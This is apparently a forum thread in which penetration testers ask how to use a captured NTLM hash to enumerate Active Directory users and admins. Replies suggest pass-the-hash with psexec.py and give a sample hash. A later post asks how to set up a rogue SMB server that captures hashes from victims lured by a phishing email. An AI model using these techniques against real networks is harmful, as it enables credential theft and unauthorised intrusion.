I have a valid username, domain name and an NTHASH. I do not have the password. Have kept it for cracking and responder so far did not help (wpad is blocked by policy it seems, or default IE / win11/10 setting) but in the meantime is it possible for me to use the NTHASH and enumerate usernames, domain admins. I tried ‘cme’ and it gave me some users via rid bf and password policy - that’s it.
rpcclient , despite of providing the NTHASH asks for the password
smbclient does not play ball.
Any other options to use NTHASH?
Can I do anything with the original user’s system - they use MacOS though.
Furthermore, is it possible for me to use this with bloodhound and sense where the admins are logged into and where?
Apologies for asking too many questions.
I am picking up network testing after 9 years! Everything is different, but somethings are the same. Any help/lead would be appreciated.
Sorry, haven’t really looked into NTHASH all that much. Maybe HackTricks could lend a hand? (you can search directly by service you want to test or NTHASH). It’s a pretty nice resource and I recommend it. Hope someone with more knowledge can come around and help you more. Cheers and gl!
Try Pass the hash technique, for example, I found that the NT hash for the user f00 is c46b9e588fa0d112de6f59fd6d58eae3 This account is part of a group which is the local administrator of all the users’ workstations. We can replay it on another machine using the psexec.py tool.
Unfortunately, the user I have is not an administrator anywhere on any Windows system in the domain except for their own MacOS system.
My enquiry was more on the lines of how to list all users and admins etc. on the domain controller using a username and the corresponding NTHASH.
I know one can fire, net user administrators /domain
But for that one needs to be logged in using a domain account, which I am not. I just have one user’s hash.
Nevertheless I shall try the above. Thank you.
Hey I know this is old but I have a somewhat related question except with windows…
I have AD credentials to a low-privileges account and wI am attempting to pivot to higher privilege accounts. After doing reconnaisance, I discovered that the AD for backwards compatibility of NTLM Authentication. I am attempting to use the pass-the-hash technique to compromise the ntlm hash for the higher privilege accounts. I have configured an html file containing a meta refresh tag (contained in an email), which will redirect the victims browser to a mock SMB server we own. As I’ve never configured and SMB server myself, would someone be able to explain how to configure the server to force/challenge NTLM authentication when connecting to it?